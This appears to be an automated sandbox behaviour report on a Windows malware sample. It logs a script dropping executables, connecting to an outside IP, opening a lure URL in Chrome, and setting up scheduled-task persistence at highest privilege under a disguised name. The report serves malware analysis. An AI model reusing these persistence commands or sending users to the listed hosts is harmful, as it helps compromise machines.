Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: wsx.exe.4.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 45.89.247.53 443 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://estudosadulto.educacao.ws/deolane.mp4 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn XHdU9gx7 /tr "C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe" /sc once /st 05:31 /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "registry_4131f52c.exe" /tr "C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe" /sc onlogon /rl highest /f Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /query /tn "registry_4131f52c.exe"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "registry_4131f52c.exe" Jump to behavior
Source: bOamY.exe, 00000010.00000002.3392308916.000001E4F6E30000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3392383746.000001E4F6E70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3392383746.000001E4F6E70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: program managerp
Source: bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managerp
Source: registry_4131f52c.exe, 00000018.00000002.3392067424.0000018B97660000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managerp$i
Source: bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3392383746.000001E4F6E70000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391647498.0000018B973F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: program manager
Source: registry_4131f52c.exe, 00000018.00000002.3392067424.0000018B97660000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: program manager`
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC388E0 cpuid 15_2_00007FF7ADC388E0
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 16_2_00007FFDA392B1E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_00007FFD8393B1E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: GetLocaleInfoW,GetProcAddress, 24_2_00007FFD838E16D4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 24_2_00007FFD8393ABB8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 24_2_00007FFD8393AB04
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: EnumSystemLocalesW, 24_2_00007FFD8393AA9C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_00007FFD8393B024
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: EnterCriticalSection,__crt_fast_encode_pointer,EnumSystemLocalesW,LeaveCriticalSection, 24_2_00007FFD83938D68
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4wToa.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4wToa.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4wToa.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4wToa.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4wToa.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\certifi VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\cryptography-3.4.8.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\ucrtbase.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76722\pywin32_system32 VolumeInformation Jump to behavior
